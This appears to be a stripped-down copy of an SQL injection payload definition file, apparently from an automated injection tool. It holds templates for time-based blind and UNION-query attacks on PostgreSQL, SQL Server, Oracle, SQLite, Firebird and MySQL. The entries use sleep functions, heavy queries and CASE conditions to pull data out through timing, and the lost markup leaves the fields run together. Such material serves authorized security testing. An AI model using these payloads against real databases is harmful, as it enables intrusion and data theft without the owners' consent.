PostgreSQL > 8.1
PostgreSQL > 8.1 AND time-based blind (comment) 5 5 1 1,2,3 1 AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME])) ELSE [RANDNUM] END) AND [RANDNUM]=(SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME])) --
PostgreSQL > 8.1
PostgreSQL AND time-based blind (heavy query) 5 3 2 1,2,3 1 AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM GENERATE_SERIES(1, [SLEEPTIME]000000)) ELSE [RANDNUM] END) AND [RANDNUM]=(SELECT COUNT(*) FROM GENERATE_SERIES(1, [SLEEPTIME]000000))
PostgreSQL
PostgreSQL AND time-based blind (heavy query - comment) 5 5 2 1,2,3 1 AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM GENERATE_SERIES(1, [SLEEPTIME]000000)) ELSE [RANDNUM] END) AND [RANDNUM]=(SELECT COUNT(*) FROM GENERATE_SERIES(1, [SLEEPTIME]000000)) --
PostgreSQL
Microsoft SQL Server/Sybase time-based blind 5 1 0 0 1 IF([INFERENCE]) WAITFOR DELAY '0:0:[SLEEPTIME]' WAITFOR DELAY '0:0:[SLEEPTIME]' --
Microsoft SQL Server Windows
Microsoft SQL Server/Sybase AND time-based blind (heavy query) 5 2 2 1,2,3 1 AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM sysusers AS sys1, sysusers as sys2, sysusers as sys3, sysusers AS sys4, sysusers AS sys5, sysusers AS sys6, sysusers AS sys7) ELSE [RANDNUM] END) AND [RANDNUM]=(SELECT COUNT(*) FROM sysusers AS sys1, sysusers as sys2, sysusers as sys3, sysusers AS sys4, sysusers AS sys5, sysusers AS sys6, sysusers AS sys7)
Microsoft SQL Server Windows
Microsoft SQL Server/Sybase AND time-based blind (heavy query - comment) 5 5 2 1,2,3 1 AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM sysusers AS sys1, sysusers as sys2, sysusers as sys3, sysusers AS sys4, sysusers AS sys5, sysusers AS sys6, sysusers AS sys7) ELSE [RANDNUM] END) AND [RANDNUM]=(SELECT COUNT(*) FROM sysusers AS sys1, sysusers as sys2, sysusers as sys3, sysusers AS sys4, sysusers AS sys5, sysusers AS sys6, sysusers AS sys7) --
Microsoft SQL Server Windows
Oracle AND time-based blind 5 1 1 1,2,3 1 AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) ELSE [RANDNUM] END) AND [RANDNUM]=DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]', [SLEEPTIME])
Oracle
Oracle AND time-based blind (comment) 5 5 1 1,2,3 1 AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) ELSE [RANDNUM] END) AND [RANDNUM]=DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]', [SLEEPTIME]) --
Oracle
Oracle AND time-based blind (heavy query) 5 2 2 1,2,3 1 AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM ALL_USERS T1, ALL_USERS T2, ALL_USERS T3, ALL_USERS T4, ALL_USERS T5) ELSE [RANDNUM] END) AND [RANDNUM]=(SELECT COUNT(*) FROM ALL_USERS T1, ALL_USERS T2, ALL_USERS T3, ALL_USERS T4, ALL_USERS T5)
Oracle
Oracle AND time-based blind (heavy query - comment) 5 5 2 1,2,3 1 AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM ALL_USERS T1, ALL_USERS T2, ALL_USERS T3, ALL_USERS T4, ALL_USERS T5) ELSE [RANDNUM] END) AND [RANDNUM]=(SELECT COUNT(*) FROM ALL_USERS T1, ALL_USERS T2, ALL_USERS T3, ALL_USERS T4, ALL_USERS T5) --
Oracle
SQLite > 2.0 AND time-based blind (heavy query) 5 3 2 1 1 AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (LIKE('ABCDEFG', UPPER(HEX(RANDOMBLOB([SLEEPTIME]0000000))))) ELSE [RANDNUM] END) AND [RANDNUM]=LIKE('ABCDEFG', UPPER(HEX(RANDOMBLOB([SLEEPTIME]0000000))))
SQLite > 2.0
SQLite > 2.0 AND time-based blind (heavy query - comment) 5 5 2 1 1 AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (LIKE('ABCDEFG', UPPER(HEX(RANDOMBLOB([SLEEPTIME]0000000))))) ELSE [RANDNUM] END) AND [RANDNUM]=LIKE('ABCDEFG', UPPER(HEX(RANDOMBLOB([SLEEPTIME]0000000)))) --
SQLite > 2.0
Firebird AND time-based blind (heavy query) 5 4 2 1 1 AND [RANDNUM]=IIF(([INFERENCE]),(SELECT COUNT(*) FROM RDB$FIELDS AS T1, RDB$TYPES AS T2, RDB$COLLATIONS AS T3),[RANDNUM]) AND [RANDNUM]=(SELECT COUNT(*) FROM RDB$FIELDS AS T1, RDB$TYPES AS T2, RDB$COLLATIONS AS T3)
Firebird >= 2.0
Firebird AND time-based blind (heavy query - comment) 5 5 2 1 1 AND [RANDNUM]=IIF(([INFERENCE]),(SELECT COUNT(*) FROM RDB$FIELDS AS T1, RDB$TYPES AS T2, RDB$COLLATIONS AS T3),[RANDNUM]) AND [RANDNUM]=(SELECT COUNT(*) FROM RDB$FIELDS AS T1, RDB$TYPES AS T2, RDB$COLLATIONS AS T3) --
Firebird >= 2.0
MySQL > 5.0.11 OR time-based blind 5 2 3 1,2,3 2 OR [RANDNUM]=IF(([INFERENCE]), SLEEP([SLEEPTIME]), [RANDNUM]) OR [RANDNUM]=SLEEP([SLEEPTIME])
MySQL > 5.0.11
MySQL < 5.0.12 OR time-based blind (heavy query) 5 4 3 1,2,3 2 OR [RANDNUM]=IF(([INFERENCE]), BENCHMARK([SLEEPTIME]000000, MD5('[SLEEPTIME]')), [RANDNUM]) OR [RANDNUM]=BENCHMARK([SLEEPTIME]000000, MD5('[SLEEPTIME]'))
MySQL
PostgreSQL > 8.1 OR time-based blind 5 3 3 1,2,3 2 OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME])) ELSE [RANDNUM] END) OR [RANDNUM]=(SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME]))
PostgreSQL > 8.1
PostgreSQL OR time-based blind (heavy query) 5 4 3 1,2,3 2 OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM GENERATE_SERIES(1, [SLEEPTIME]000000)) ELSE [RANDNUM] END) OR [RANDNUM]=(SELECT COUNT(*) FROM GENERATE_SERIES(1, [SLEEPTIME]000000))
PostgreSQL
Microsoft SQL Server/Sybase OR time-based blind (heavy query) 5 3 3 1,2,3 2 OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM sysusers AS sys1, sysusers as sys2, sysusers as sys3, sysusers AS sys4, sysusers AS sys5, sysusers AS sys6, sysusers AS sys7) ELSE [RANDNUM] END) OR [RANDNUM]=(SELECT COUNT(*) FROM sysusers AS sys1, sysusers as sys2, sysusers as sys3, sysusers AS sys4, sysusers AS sys5, sysusers AS sys6, sysusers AS sys7)
Microsoft SQL Server Windows
Oracle OR time-based blind 5 3 3 1,2,3 2 OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) ELSE [RANDNUM] END) OR [RANDNUM]=DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME])
Oracle
Oracle OR time-based blind (heavy query) 5 4 3 1,2,3 2 OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM ALL_USERS T1, ALL_USERS T2, ALL_USERS T3, ALL_USERS T4, ALL_USERS T5) ELSE [RANDNUM] END) OR [RANDNUM]=(SELECT COUNT(*) FROM ALL_USERS T1, ALL_USERS T2, ALL_USERS T3, ALL_USERS T4, ALL_USERS T5)
Oracle
SQLite > 2.0 OR time-based blind (heavy query) 5 4 3 1 2 OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (LIKE('ABCDEFG', UPPER(HEX(RANDOMBLOB([SLEEPTIME]0000000))))) ELSE [RANDNUM] END) OR [RANDNUM]=LIKE('ABCDEFG', UPPER(HEX(RANDOMBLOB([SLEEPTIME]0000000))))
SQLite > 2.0
Firebird OR time-based blind (heavy query) 5 5 3 1 2 OR [RANDNUM]=IIF(([INFERENCE]),(SELECT COUNT(*) FROM RDB$FIELDS AS T1, RDB$TYPES AS T2, RDB$COLLATIONS AS T3),[RANDNUM]) OR [RANDNUM]=(SELECT COUNT(*) FROM RDB$FIELDS AS T1, RDB$TYPES AS T2, RDB$COLLATIONS AS T3)
Firebird >= 2.0
MySQL UNION query ([CHAR]) - [COLSTART] to [COLSTOP] columns 3 1 1 1,2,3,4,5 1 [UNION] # NULL [COLSTART]-[COLSTOP]
MySQL
MySQL UNION query ([CHAR]) - 1 to 3 columns 3 1 1 1,2,3,4,5 1 [UNION] # NULL 1-3
MySQL
MySQL UNION query ([CHAR]) - 4 to 7 columns 3 2 1 1,2,3,4,5 1 [UNION] # NULL 4-7
MySQL
MySQL UNION query ([CHAR]) - 8 to 12 columns 3 3 1 1,2,3,4,5 1 [UNION] # NULL 8-12
MySQL
MySQL UNION query ([CHAR]) - 13 to 18 columns 3 4 1 1,2,3,4,5 1 [UNION] # NULL 13-18
MySQL
MySQL UNION query ([CHAR]) - 19 to 25 columns 3 5 1 1,2,3,4,5 1 [UNION] # NULL 19-25
MySQL
Generic UNION query ([CHAR]) - [COLSTART] to [COLSTOP] columns 3 1 1 1,2,3,4,5 1 [UNION] -- NULL [COLSTART]-[COLSTOP] Generic UNION query ([CHAR]) - 1 to 3 columns 3 1 1 1,2,3,4,5 1 [UNION] -- NULL 1-3 Generic UNION query ([CHAR]) - 4 to 7 columns 3 2 1 1,2,3,4,5 1 [UNION] -- NULL 4-7 Generic UNION query ([CHAR]) - 8 to 12 columns 3 3 1 1,2,3,4,5 1 [UNION] -- NULL 8-12 Generic UNION query ([CHAR]) - 13 to 18 columns 3 4 1 1,2,3,4,5 1 [UNION] -- NULL 13-18 Generic UNION query ([CHAR]) - 19 to 25 columns 3 5 1 1,2,3,4,5 1 [UNION] -- NULL 19-25